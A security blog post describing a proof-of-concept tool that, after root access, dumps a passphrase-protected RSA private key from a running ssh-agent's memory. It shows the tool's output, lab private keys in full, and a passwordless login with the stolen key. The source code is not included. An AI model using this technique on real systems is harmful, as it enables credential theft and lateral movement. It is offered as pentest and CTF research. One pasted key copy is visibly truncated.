Dumping SSH Private Key (RSA) from SSH-Agent

I played a capture the flag contest held by Sapheads (http://sapheads.wordpress.com/2009/09/20/hackjam-results/) and one of the challenges I didn't solved was on my todo list for quiet some time now and I thought if I don't do it now, it will never be done.

The challenge included a coredump file of ssh-agent and the goal was to recover the private key from this dump file.
I took this idea and thought why not making a runtime dumper, so basically during a pentest you own a system and you see ssh-agent running, what next ?
Yes you can just use the current session to connect to the trusted hosts, etc. but it's always nicer to have the private key and be able to test it against hosts which are maybe in an other segment to which you can't connect from this hosts or maybe the key is passphrase protected, what you do then ?

I'll not explain the internals as two other participating groups wrote excellent write ups, which will explain every technical detail needed to solve it manually.

  • http://www.vnsecurity.net/2009/10/how-to-recover-rsa-private-key-in-a-coredump-of-ssh-agent-sapheads-hackjam-2009-challenge-6/
  • http://www-pool.math.tu-berlin.de/~hesso/Hackjam_Walkthrough.xhtml
  • Test environment
    As test environment I'm using a debian running in a vmware workstation.

    ptdeb:/home/user/extract0r# uname -a
    Linux ptdeb 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686 GNU/Linux

    the ssh version in use is:

    ptdeb:/home/user/extract0r# ssh -V
    OpenSSH_5.1p1 Debian-5, OpenSSL 0.9.8g 19 Oct 2007

    If you read the two walkthrough you know that you need to find the:

    /* pathname and directory for AUTH_SOCKET */
    char socket_name[1024];

    in memory and then find the Idtab structure before this variable.
    After that it's basically following pointers and reconstructing structures to be able to recalculate the private key.

    The real life test
    On the debian box create a rsa key and add a passphrase.

    user@ptdeb:~$ openssl rsa -text -in .ssh/id_rsa
    Enter pass phrase for .ssh/id_rsa:
    unable to load Private Key
    2915:error:06065064:digital envelope routines:EVP_DecryptFinal_ex:bad decrypt:evp_enc.c:461:
    2915:error:0906A065:PEM routines:PEM_do_header:bad decrypt:pem_lib.c:425:

    As we can see a passphrase is needed to access the key, with the right key we get.

    user@ptdeb:~$ openssl rsa -text -in .ssh/id_rsa
    Enter pass phrase for .ssh/id_rsa:
    Private-Key: (2048 bit)
    modulus:
        00:d8:b6:38:41:ba:db:ca:36:29:a2:3f:64:3b:97:
        7c:c2:d9:59:a1:c7:47:9a:00:f0:55:4c:cc:74:fc:
        fd:4d:62:35:d8:75:47:0c:32:97:f0:76:9f:2c:50:
        c1:98:9d:bf:9f:ed:a7:44:8b:ba:c2:2c:32:5e:55:
        e2:b2:a3:d7:f2:8b:15:93:cc:f3:01:79:4a:f1:4d:
        a7:3c:47:32:bd:1e:f2:a2:ef:24:29:79:b2:ae:b0:
        d7:51:18:71:ff:55:62:2c:3b:87:4e:97:57:74:47:
        29:93:a5:ed:55:2c:44:f0:1e:76:c1:a0:b6:e4:03:
        4f:86:82:63:fd:f5:2a:70:d4:ed:fa:24:56:b3:76:
        5e:3f:e6:80:d8:a7:ad:49:f0:15:2c:89:51:e8:9b:
        db:c8:95:2b:d9:24:63:5c:d6:cc:97:f5:70:1d:31:
        87:14:10:9a:13:f7:a8:d2:fb:3c:6a:2b:63:af:15:
        a9:45:e1:f5:52:e9:c0:da:5d:78:2f:df:4d:c8:2b:
        b9:1f:db:6e:08:d3:60:cb:5a:67:4c:98:05:1f:34:
        ac:56:6b:fb:9e:48:9d:b5:d2:86:32:0c:83:38:71:
        76:61:a7:08:6f:ae:ea:76:d8:15:ab:8a:f8:a2:26:
        0d:c2:3e:05:44:1c:6b:de:d0:b4:5b:c3:c4:a5:60:
        d4:d9
    publicExponent: 35 (0x23)
    privateExponent:
        00:88:38:06:1a:af:f7:de:30:ac:74:9c:df:ea:f1:
        81:9f:0c:46:f7:f9:9a:b8:92:e0:35:9d:fc:db:d2:
        38:d1:8e:30:79:6e:49:ea:68:f1:ca:59:30:da:06:
        e0:16:c9:8e:64:86:c0:e9:41:e3:1a:f7:35:9a:61:
        de:f3:f1:f5:73:e2:65:55:96:c4:a1:d7:36:6b:ca:
        69:1e:93:27:35:0c:23:7c:5b:cd:96:69:c0:c5:93:
        ba:8a:be:e8:91:dd:e5:ef:ea:e7:55:f8:ba:a0:dc:
        46:05:09:36:18:47:b6:4d:ca:01:81:05:ef:4d:7e:
        6c:80:6f:37:89:b0:0c:0c:67:6d:6b:81:cd:b2:d5:
        32:0f:29:2d:61:3b:96:44:c6:4a:f0:1a:be:ca:14:
        68:41:f4:17:d8:17:ad:1e:4f:b5:ae:5f:dc:46:ad:
        83:90:ed:1c:72:0f:1b:4b:aa:e9:54:a7:ed:2d:c7:
        60:d8:90:79:be:a8:b0:64:52:c8:bb:05:84:c3:3d:
        a3:c7:b0:ef:93:0b:c1:aa:53:c1:df:ef:6e:bf:78:
        ab:5d:cd:d3:11:23:33:33:a3:89:06:1f:6a:2f:64:
        19:53:cd:3f:73:fc:cc:8b:05:18:88:83:4d:a4:26:
        c1:1d:71:67:73:85:90:9a:8d:69:c0:87:8f:a5:be:
        e4:93
    prime1:
        00:f0:59:b9:af:2c:25:2c:bf:03:57:d5:86:88:66:
        84:6b:76:bf:e7:2f:91:7a:c4:b1:b3:c1:27:d2:9e:
        36:b1:49:ab:01:05:fc:0a:21:cd:79:98:55:63:a7:
        87:48:ab:8c:63:19:5b:26:0d:e3:c6:39:cd:79:3c:
        23:fb:a7:14:bc:c6:5d:63:45:10:51:ed:59:03:53:
        f6:d9:8e:b8:51:48:fa:cb:f7:71:5e:3a:ee:16:11:
        0e:12:17:7b:06:f9:d4:9d:b5:c4:91:e6:68:71:72:
        95:4a:fd:95:c9:f9:20:9c:a5:30:ce:fc:98:a4:70:
        e5:16:4e:95:f9:c7:34:80:8b
    prime2:
        00:e6:d2:79:3d:5f:2c:90:68:c4:8f:5c:cd:fb:a4:
        8d:49:c3:70:52:77:8c:d2:6c:6a:c6:86:05:71:b1:
        4f:d7:5b:c9:33:8f:7e:88:ba:3e:44:ae:e7:53:ed:
        41:23:72:1f:7b:9e:5a:69:25:46:e1:c6:e1:5d:8a:
        41:6b:bc:59:0f:3f:8f:2e:62:eb:cd:82:fe:ef:2e:
        3b:64:f0:e2:c9:77:11:2c:d5:61:b6:53:b9:cd:75:
        86:1a:1c:76:c7:ad:66:53:49:79:05:f3:a8:a7:f8:
        8c:23:a6:3b:90:3b:24:e0:cb:4d:28:f8:75:1b:8f:
        50:75:cf:3e:da:b3:93:e8:ab
    exponent1:
        1b:77:f7:f6:c3:37:72:d4:00:61:cf:42:93:3e:ea:
        8f:f0:50:72:31:52:74:6e:40:31:cc:ee:9b:ba:4f:
        64:b7:f6:49:42:83:34:5b:a2:74:4b:ec:80:6a:ea:
        e3:bb:d5:87:ab:20:5c:1e:d8:33:e9:59:4f:af:1a:
        0e:21:b9:3a:25:4c:80:5f:aa:17:fd:de:49:85:f0:
        53:60:c4:9b:93:4f:dc:cb:d2:71:2b:4e:68:ec:01:
        9b:aa:e9:7d:23:dd:c8:e1:92:ce:d8:80:f7:05:c7:
        eb:50:2e:60:39:ba:95:8f:38:c7:32:cf:9d:c3:c2:
        68:f3:09:d3:67:39:33:43
    exponent2:
        4f:23:97:48:3d:e3:64:b6:34:c3:70:46:9f:6b:9e:
        27:eb:3c:74:0b:bb:40:d4:b6:e4:fa:c0:09:b9:22:
        b0:3c:ba:03:0c:a0:69:64:6d:1e:dc:e1:99:1e:24:
        f6:35:c1:a6:b9:f3:1c:bc:52:d1:10:fc:cf:9d:1d:
        be:89:b8:22:7c:31:17:37:db:d1:6e:bd:ce:58:fe:
        6b:c0:4d:c1:6a:a6:cd:8a:fc:ee:0e:13:d1:6a:1f:
        59:68:d8:44:75:f7:32:7f:97:35:3d:98:e9:22:04:
        29:7a:d2:97:d9:c3:80:45:b4:0e:0c:0a:e4:e0:ad:
        df:3f:bd:c7:53:83:2b:33
    coefficient:
        1c:65:ea:4a:bf:3f:a0:5b:92:d5:46:6d:e3:ad:d0:
        1e:8e:6d:47:61:10:ea:e3:62:f6:13:03:de:df:9c:
        c8:2e:7e:60:a4:a7:95:8f:58:d0:d2:30:48:fa:e2:
        e8:93:f4:1f:25:fb:c5:40:08:5a:50:7c:b6:20:56:
        30:c5:4d:6e:94:4b:18:5b:46:8b:92:5b:76:65:e6:
        2d:50:e1:7c:db:49:4b:bc:a7:b3:87:e9:9f:b3:a5:
        73:21:10:ba:d7:3f:be:ec:f1:ee:99:cd:30:5d:b7:
        51:55:34:6f:81:c9:b9:85:3f:e9:08:42:5f:04:ca:
        9d:5b:03:56:f7:f2:c4:39
    writing RSA key
    -----BEGIN RSA PRIVATE KEY-----
    MIIEoQIBAAKCAQEA2LY4QbrbyjYpoj9kO5d8wtlZocdHmgDwVUzMdPz9TWI12HVH
    DDKX8HafLFDBmJ2/n+2nRIu6wiwyXlXisqPX8osVk8zzAXlK8U2nPEcyvR7you8k
    KXmyrrDXURhx/1ViLDuHTpdXdEcpk6XtVSxE8B52waC25ANPhoJj/fUqcNTt+iRW
    s3ZeP+aA2KetSfAVLIlR6JvbyJUr2SRjXNbMl/VwHTGHFBCaE/eo0vs8aitjrxWp
    ReH1UunA2l14L99NyCu5H9tuCNNgy1pnTJgFHzSsVmv7nkidtdKGMgyDOHF2YacI
    b67qdtgVq4r4oiYNwj4FRBxr3tC0W8PEpWDU2QIBIwKCAQEAiDgGGq/33jCsdJzf
    6vGBnwxG9/mauJLgNZ3829I40Y4weW5J6mjxylkw2gbgFsmOZIbA6UHjGvc1mmHe
    8/H1c+JlVZbEodc2a8ppHpMnNQwjfFvNlmnAxZO6ir7okd3l7+rnVfi6oNxGBQk2
    GEe2TcoBgQXvTX5sgG83ibAMDGdta4HNstUyDyktYTuWRMZK8Bq+yhRoQfQX2Bet
    Hk+1rl/cRq2DkO0ccg8bS6rpVKftLcdg2JB5vqiwZFLIuwWEwz2jx7DvkwvBqlPB
    3+9uv3irXc3TESMzM6OJBh9qL2QZU80/c/zMiwUYiINNpCbBHXFnc4WQmo1pwIeP
    pb7kkwKBgQDwWbmvLCUsvwNX1YaIZoRrdr/nL5F6xLGzwSfSnjaxSasBBfwKIc15
    mFVjp4dIq4xjGVsmDePGOc15PCP7pxS8xl1jRRBR7VkDU/bZjrhRSPrL93FeOu4W
    EQ4SF3sG+dSdtcSR5mhxcpVK/ZXJ+SCcpTDO/JikcOUWTpX5xzSAiwKBgQDm0nk9
    XyyQaMSPXM37pI1Jw3BSd4zSbGrGhgVxsU/XW8kzj36Iuj5ErudT7UEjch97nlpp
    JUbhxuFdikFrvFkPP48uYuvNgv7vLjtk8OLJdxEs1WG2U7nNdYYaHHbHrWZTSXkF
    86in+IwjpjuQOyTgy00o+HUbj1B1zz7as5PoqwKBgBt39/bDN3LUAGHPQpM+6o/w
    UHIxUnRuQDHM7pu6T2S39klCgzRbonRL7IBq6uO71YerIFwe2DPpWU+vGg4huTol
    TIBfqhf93kmF8FNgxJuTT9zL0nErTmjsAZuq6X0j3cjhks7YgPcFx+tQLmA5upWP
    OMcyz53DwmjzCdNnOTNDAoGATyOXSD3jZLY0w3BGn2ueJ+s8dAu7QNS25PrACbki
    sDy6AwygaWRtHtzhmR4k9jXBprnzHLxS0RD8z50dvom4InwxFzfb0W69zlj+a8BN
    wWqmzYr87g4T0WofWWjYRHX3Mn+XNT2Y6SIEKXrSl9nDgEW0DgwK5OCt3z+9x1OD
    KzMCgYAcZepKvz+gW5LVRm3jrdAejm1HYRDq42L2EwPe35zILn5gpKeVj1jQ0jBI
    +uLok/QfJfvFQAhaUHy2IFYwxU1ulEsYW0aLklt2ZeYtUOF820lLvKezh+mfs6Vz
    IRC61z++7PHumc0wXbdRVTRvgcm5hT/pCEJfBMqdWwNW9/LEOQ==
    -----END RSA PRIVATE KEY-----

    Now let's start a ssh-agent session and add the key to it.

    user@ptdeb:~$ ssh-agent bash
    user@ptdeb:~$ ssh-add
    Enter passphrase for /home/user/.ssh/id_rsa:
    Identity added: /home/user/.ssh/id_rsa (/home/user/.ssh/id_rsa)

    This looks all good.
    Now let's assume you owned the box with some exploit and got a nice root shell and you see following service running.

    ptdeb:/home/user/extract0r# ps aux | grep ssh-agent
    user      2917  0.0  0.3   4756   920 ?        S

    You get already exited but when looking at the ssh folder you find A this.
    A.)

    ptdeb:/home/user/extract0r# ls -al ../.ssh/
    total 16
    drwx------  2 user user 4096 2010-04-06 05:47 .
    drwxr-xr-x 15 user user 4096 2010-04-06 05:29 ..
    -rw-r--r--  1 user user  393 2009-10-06 06:02 authorized_keys
    -rw-r--r--  1 user user  392 2010-04-06 02:52 id_rsa.pub
    -rw-r--r--  1 user user    0 2009-10-12 04:24 known_hosts
    ptdeb:/home/user/extract0r#

    Looks like the private key was removed after the ssh-agent session was launched and the key added.

    or B this.
    B.)

    ptdeb:/home/user/extract0r# ls -al ../.ssh/
    total 20
    drwx------  2 user user 4096 2010-04-06 05:50 .
    drwxr-xr-x 15 user user 4096 2010-04-06 05:29 ..
    -rw-r--r--  1 user user  393 2009-10-06 06:02 authorized_keys
    -rw-------  1 user user 1743 2010-04-06 05:50 id_rsa
    -rw-r--r--  1 user user  392 2010-04-06 02:52 id_rsa.pub
    -rw-r--r--  1 user user    0 2009-10-12 04:24 known_hosts

    And when you try to use it.

    ptdeb:/home/user/extract0r# ssh user@172.16.1.129 -i ../.ssh/id_rsa
    The authenticity of host '172.16.1.129 (172.16.1.129)' can't be established.
    RSA key fingerprint is 8f:45:d4:e9:6d:b5:2f:07:d0:a2:48:59:ca:88:d8:90.
    Are you sure you want to continue connecting (yes/no)? yes
    Warning: Permanently added '172.16.1.129' (RSA) to the list of known hosts.
    Enter passphrase for key '../.ssh/id_rsa':
    user@172.16.1.129's password:

    Either way you can't get the key working, nor extracting it.
    Let's get back to the fun part.

    I made a proof of concept to automatically recreate the private key as shown below.

    extract0r

    ptdeb:/home/user/extract0r# ps aux | grep ssh-agent
    user      2917  0.0  0.3   4756   920 ?        S

    Let's compile and run it

    ptdeb:/home/user/extract0r# cc -o sshex sshex.c -lcrypto -W
    ptdeb:/home/user/extract0r# ./sshex
    -=[ extract0r ]=-
    -p    PID of ssh-agent
    -f    Filename of keyfile
    -v    Be verbose
    -h    This small msg
    Example: ./sshex -p 1234 -f my_dumped_key

    Let's run it against our ssh-agent process.

    ptdeb:/home/user/extract0r# ./sshex -p 2917 -v -f dumped_key
    [+] Process name: ssh-agent
    [+] Dumping memory area b7f79000-b7f8e000 with perm r-xp
    [+] File ssh-agent_2917_r-xp_b7f79000_b7f8e000 written
    [+] Memory dumped to: ssh-agent_2917_r-xp_b7f79000_b7f8e000
    [+] Searching for socket_name[1024]
    [+] Dumping memory area b7f8e000-b7f8f000 with perm rw-p
    [+] File ssh-agent_2917_rw-p_b7f8e000_b7f8f000 written
    [+] Memory dumped to: ssh-agent_2917_rw-p_b7f8e000_b7f8f000
    [+] Searching for socket_name[1024]
    [!] Found socketname /tmp/ssh-QiuMOd2916/agent.2916 @ 0xbfffcfa0
    [+] Idtab found: 0x804c980 entries: 1 identity struct: 0xb7f99838
    [+] Trying to assemble the comment located at 0xb7f99818
    [+] Identity key struct: 0xb7f995d8 comment: /home/user/.ssh/id_rsa
    [+] Key found: 1 : 0 : 0xb7f995f0 : (nil)
    [+] RSA n:0xb7f99690 e:0xb7f996a8 d:0xb7f996c0 p:0xb7f99708 q:0xb7f996f0 dmp1:0xb7f99738 dmq1:0xb7f99720 iqmp:0xb7f996d8
    [+] BIGNUM N at: 0xb7f99858
    modulus:
    00:d8:b6:38:41:ba:db:ca:36:29:a2:3f:64:3b:97:
    7c:c2:d9:59:a1:c7:47:9a:00:f0:55:4c:cc:74:fc:
    fd:4d:62:35:d8:75:47:0c:32:97:f0:76:9f:2c:50:
    c1:98:9d:bf:9f:ed:a7:44:8b:ba:c2:2c:32:5e:55:
    e2:b2:a3:d7:f2:8b:15:93:cc:f3:01:79:4a:f1:4d:
    a7:3c:47:32:bd:1e:f2:a2:ef:24:29:79:b2:ae:b0:
    d7:51:18:71:ff:55:62:2c:3b:87:4e:97:57:74:47:
    29:93:a5:ed:55:2c:44:f0:1e:76:c1:a0:b6:e4:03:
    4f:86:82:63:fd:f5:2a:70:d4:ed:fa:24:56:b3:76:
    5e:3f:e6:80:d8:a7:ad:49:f0:15:2c:89:51:e8:9b:
    db:c8:95:2b:d9:24:63:5c:d6:cc:97:f5:70:1d:31:
    87:14:10:9a:13:f7:a8:d2:fb:3c:6a:2b:63:af:15:
    a9:45:e1:f5:52:e9:c0:da:5d:78:2f:df:4d:c8:2b:
    b9:1f:db:6e:08:d3:60:cb:5a:67:4c:98:05:1f:34:
    ac:56:6b:fb:9e:48:9d:b5:d2:86:32:0c:83:38:71:
    76:61:a7:08:6f:ae:ea:76:d8:15:ab:8a:f8:a2:26:
    0d:c2:3e:05:44:1c:6b:de:d0:b4:5b:c3:c4:a5:60:
    d4:d9:
    [+] N is: D8B63841BADBCA3629A23F643B977CC2D959A1C7479A00F0554CCC74FCFD4D6235D875470C3297F0769F2C50C1989DBF9FEDA7448BBAC22C325E55E2B2A3D7F28B1593CCF301794AF14DA73C4732BD1EF2A2EF242979B2AEB0D7511871FF55622C3B874E975774472993A5ED552C44F01E76C1A0B6E4034F868263FDF52A70D4EDFA2456B3765E3FE680D8A7AD49F0152C8951E89BDBC8952BD924635CD6CC97F5701D318714109A13F7A8D2FB3C6A2B63AF15A945E1F552E9C0DA5D782FDF4DC82BB91FDB6E08D360CB5A674C98051F34AC566BFB9E489DB5D286320C8338717661A7086FAEEA76D815AB8AF8A2260DC23E05441C6BDED0B45BC3C4A560D4D9
    publicExponent: 35 (23)
    [+] E is: 23
    privateExponent:
    00:88:38:06:1a:af:f7:de:30:ac:74:9c:df:ea:f1:
    81:9f:0c:46:f7:f9:9a:b8:92:e0:35:9d:fc:db:d2:
    38:d1:8e:30:79:6e:49:ea:68:f1:ca:59:30:da:06:
    e0:16:c9:8e:64:86:c0:e9:41:e3:1a:f7:35:9a:61:
    de:f3:f1:f5:73:e2:65:55:96:c4:a1:d7:36:6b:ca:
    69:1e:93:27:35:0c:23:7c:5b:cd:96:69:c0:c5:93:
    ba:8a:be:e8:91:dd:e5:ef:ea:e7:55:f8:ba:a0:dc:
    46:05:09:36:18:47:b6:4d:ca:01:81:05:ef:4d:7e:
    6c:80:6f:37:89:b0:0c:0c:67:6d:6b:81:cd:b2:d5:
    32:0f:29:2d:61:3b:96:44:c6:4a:f0:1a:be:ca:14:
    68:41:f4:17:d8:17:ad:1e:4f:b5:ae:5f:dc:46:ad:
    83:90:ed:1c:72:0f:1b:4b:aa:e9:54:a7:ed:2d:c7:
    60:d8:90:79:be:a8:b0:64:52:c8:bb:05:84:c3:3d:
    a3:c7:b0:ef:93:0b:c1:aa:53:c1:df:ef:6e:bf:78:
    ab:5d:cd:d3:11:23:33:33:a3:89:06:1f:6a:2f:64:
    19:53:cd:3f:73:fc:cc:8b:05:18:88:83:4d:a4:26:
    c1:1d:71:67:73:85:90:9a:8d:69:c0:87:8f:a5:be:
    e4:93:
    [+] D is: 8838061AAFF7DE30AC749CDFEAF1819F0C46F7F99AB892E0359DFCDBD238D18E30796E49EA68F1CA5930DA06E016C98E6486C0E941E31AF7359A61DEF3F1F573E2655596C4A1D7366BCA691E9327350C237C5BCD9669C0C593BA8ABEE891DDE5EFEAE755F8BAA0DC460509361847B64DCA018105EF4D7E6C806F3789B00C0C676D6B81CDB2D5320F292D613B9644C64AF01ABECA146841F417D817AD1E4FB5AE5FDC46AD8390ED1C720F1B4BAAE954A7ED2DC760D89079BEA8B06452C8BB0584C33DA3C7B0EF930BC1AA53C1DFEF6EBF78AB5DCDD311233333A389061F6A2F641953CD3F73FCCC8B051888834DA426C11D71677385909A8D69C0878FA5BEE493
    prime1:
    00:f0:59:b9:af:2c:25:2c:bf:03:57:d5:86:88:66:
    84:6b:76:bf:e7:2f:91:7a:c4:b1:b3:c1:27:d2:9e:
    36:b1:49:ab:01:05:fc:0a:21:cd:79:98:55:63:a7:
    87:48:ab:8c:63:19:5b:26:0d:e3:c6:39:cd:79:3c:
    23:fb:a7:14:bc:c6:5d:63:45:10:51:ed:59:03:53:
    f6:d9:8e:b8:51:48:fa:cb:f7:71:5e:3a:ee:16:11:
    0e:12:17:7b:06:f9:d4:9d:b5:c4:91:e6:68:71:72:
    95:4a:fd:95:c9:f9:20:9c:a5:30:ce:fc:98:a4:70:
    e5:16:4e:95:f9:c7:34:80:8b:
    [+] P is: F059B9AF2C252CBF0357D5868866846B76BFE72F917AC4B1B3C127D29E36B149AB0105FC0A21CD79985563A78748AB8C63195B260DE3C639CD793C23FBA714BCC65D63451051ED590353F6D98EB85148FACBF7715E3AEE16110E12177B06F9D49DB5C491E6687172954AFD95C9F9209CA530CEFC98A470E5164E95F9C734808B
    prime2:
    00:e6:d2:79:3d:5f:2c:90:68:c4:8f:5c:cd:fb:a4:
    8d:49:c3:70:52:77:8c:d2:6c:6a:c6:86:05:71:b1:
    4f:d7:5b:c9:33:8f:7e:88:ba:3e:44:ae:e7:53:ed:
    41:23:72:1f:7b:9e:5a:69:25:46:e1:c6:e1:5d:8a:
    41:6b:bc:59:0f:3f:8f:2e:62:eb:cd:82:fe:ef:2e:
    3b:64:f0:e2:c9:77:11:2c:d5:61:b6:53:b9:cd:75:
    86:1a:1c:76:c7:ad:66:53:49:79:05:f3:a8:a7:f8:
    8c:23:a6:3b:90:3b:24:e0:cb:4d:28:f8:75:1b:8f:
    50:75:cf:3e:da:b3:93:e8:ab:
    [+] Q is: E6D2793D5F2C9068C48F5CCDFBA48D49C37052778CD26C6AC6860571B14FD75BC9338F7E88BA3E44AEE753ED4123721F7B9E5A692546E1C6E15D8A416BBC590F3F8F2E62EBCD82FEEF2E3B64F0E2C977112CD561B653B9CD75861A1C76C7AD6653497905F3A8A7F88C23A63B903B24E0CB4D28F8751B8F5075CF3EDAB393E8AB
    [+] Testing RSA Key
    
    [+] p (1024 bits) seems to be a prime (after 3 tests)
    [+] q (1024 bits) seems to be a prime (after 3 tests)
    [+] n is 2048 bits long.

    Looks like it worked :)
    Here's the dumped rsa key.

    -----BEGIN RSA PRIVATE KEY-----
    MIIDIQIBAAKCAQEA2LY4QbrbyjYpoj9kO5d8wtlZocdHmgDwVUzMdPz9TWI12HVH
    DDKX8HafLFDBmJ2/n+2nRIu6wiwyXlXisqPX8osVk8zzAXlK8U2nPEcyvR7you8k
    KXmyrrDXURhx/1ViLDuHTpdXdEcpk6XtVSxE8B52waC25ANPhoJj/fUqcNTt+iRW
    s3ZeP+aA2KetSfAVLIlR6JvbyJUr2SRjXNbMl/VwHTGHFBCaE/eo0vs8aitjrxWp
    ReH1UunA2l14L99NyCu5H9tuCNNgy1pnTJgFHzSsVmv7nkidtdKGMgyDOHF2YacI
    b67qdtgVq4r4oiYNwj4FRBxr3tC0W8PEpWDU2QIBIwKCAQEAiDgGGq/33jCsdJzf
    6vGBnwxG9/mauJLgNZ3829I40Y4weW5J6mjxylkw2gbgFsmOZIbA6UHjGvc1mmHe
    8/H1c+JlVZbEodc2a8ppHpMnNQwjfFvNlmnAxZO6ir7okd3l7+rnVfi6oNxGBQk2
    GEe2TcoBgQXvTX5sgG83ibAMDGdta4HNstUyDyktYTuWRMZK8Bq+yhRoQfQX2Bet
    Hk+1rl/cRq2DkO0ccg8bS6rpVKftLcdg2JB5vqiwZFLIuwWEwz2jx7DvkwvBqlPB
    3+9uv3irXc3TESMzM6OJBh9qL2QZU80/c/zMiwUYiINNpCbBHXFnc4WQmo1pwIeP
    pb7kkwKBgQDwWbmvLCUsvwNX1YaIZoRrdr/nL5F6xLGzwSfSnjaxSasBBfwKIc15
    mFVjp4dIq4xjGVsmDePGOc15PCP7pxS8xl1jRRBR7VkDU/bZjrhRSPrL93FeOu4W
    EQ4SF3sG+dSdtcSR5mhxcpVK/ZXJ+SCcpTDO/JikcOUWTpX5xzSAiwKBgQDm0nk9
    XyyQaMSPXM37pI1Jw3BSd4zSbGrGhgVxsU/XW8kzj36Iuj5ErudT7UEjch97nlpp
    JUbhxuFdikFrvFkPP48uYuvNgv7vLjtk8OLJdxEs1WG2U7nNdYYaHHbHrWZTSXkF
    86in+IwjpjuQOyTgy00o+HUbj1B1zz7as5PoqwIBAAIBAAIBAA==
    -----END RSA PRIVATE KEY-----

    Now we need to check if it actually works.
    This is the output on another box.

    qwerty:Desktop user$ uname -a
    Darwin qwerty 9.8.0 Darwin Kernel Version 9.8.0: Wed Jul 15 16:55:01 PDT 2009; root:xnu-1228.15.4~1/RELEASE_I386 i386
    qwerty:Desktop user$
    qwerty:Desktop user$ cat > dumped_key
    -----BEGIN RSA PRIVATE KEY-----
    MIIDIQIBAAKCAQEA2LY4QbrbyjYpoj9kO5d8wtlZocdHmgDwVUzMdPz9TWI12HVH
    DDKX8HafLFDBmJ2/n+2nRIu6wiwyXlXisqPX8osVk8zzAXlK8U2nPEcyvR7you8k
    KXmyrrDXURhx/1ViLDuHTpdXdEcpk6XtVSxE8B52waC25ANPhoJj/fUqcNTt+iRW
    s3ZeP+aA2KetSfAVLIlR6JvbyJUr2SRjXNbMl/VwHTGHFBCaE/eo0vs8aitjrxWp
    ReH1UunA2l14L99NyCu5H9tuCNNgy1pnTJgFHzSsVmv7nkidtdKGMgyDOHF2YacI
    b67qdtgVq4r4oiYNwj4FRBxr3tC0W8PEpWDU2QIBIwKCAQEAiDgGGq/33jCsdJzf
    6vGBnwxG9/mauJLgNZ3829I40Y4weW5J6mjxylkw2gbgFsmOZIbA6UHjGvc1mmHe
    8/H1c+JlVZbEodc2a8ppHpMnNQwjfFvNlmnAxZO6ir7okd3l7+rnVfi6oNxGBQk2
    GEe2TcoBgQXvTX5sgG83ibAMDGdta4HNstUyDyktYTuWRMZK8Bq+yhRoQfQX2Bet
    Hk+1rl/cRq2DkO0ccg8bS6rpVKftLcdg2JB5vqiwZFLIuwWEwz2jx7DvkwvBqlPB
    3+9uv3irXc3TESMzM6OJBh9qL2QZU80/c/zMiwUYiINNpCbBHXFnc4WQmo1pwIeP
    pb7kkwKBgQDwWbmvLCUsvwNX1YaIZoRrdr/nL5F6xLGzwSfSnjaxSasBBfwKIc15
    mFVjp4dIq4xjGVsmDePGOc15PCP7pxS8xl1jRRBR7VkDU/bZjrhRSPrL93FeOu4W
    EQ4SF3sG+dSdtcSR5mhxcpVK/ZXJ+SCcpTDO/JikcOUWTpX5xzSAiwKBgQDm0nk9
    XyyQaMSPXM37pI1Jw3BSd4zSbGrGhgVxsU/XW8kzj36Iuj5ErudT7UEjch97nlpp
    JPP48uYuvNgv7vLjtk8OLJdxEs1WG2U7nNdYYaHHbHrWZTSXkF
    86in+IwjpjuQOyTgy00o+HUbj1B1zz7as5PoqwIBAAIBAAIBAA==
    -----END RSA PRIVATE KEY-----
    ^C
    qwerty:Desktop user$ chmod 0600 dumped_key
    qwerty:Desktop user$ ssh user@172.16.1.129 -i dumped_key
    Linux ptdeb 2.6.26-2-686 #1 SMP Tue Mar 9 17:35:51 UTC 2010 i686
    
    The programs included with the Debian GNU/Linux system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.
    
    Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
    permitted by applicable law.
    Last login: Tue Apr  6 06:49:04 2010 from user
    user@ptdeb:~$

    As we can see it worked like charm and no passphrase was needed :)

    If someone wants the code really badly, then drop me a mail. The code is pretty ugly and I'm a bit ashamed to publish it.

    © 2015 coma. All rights reserved.
    Disclaimer: There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk.
    In no event shall the author be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.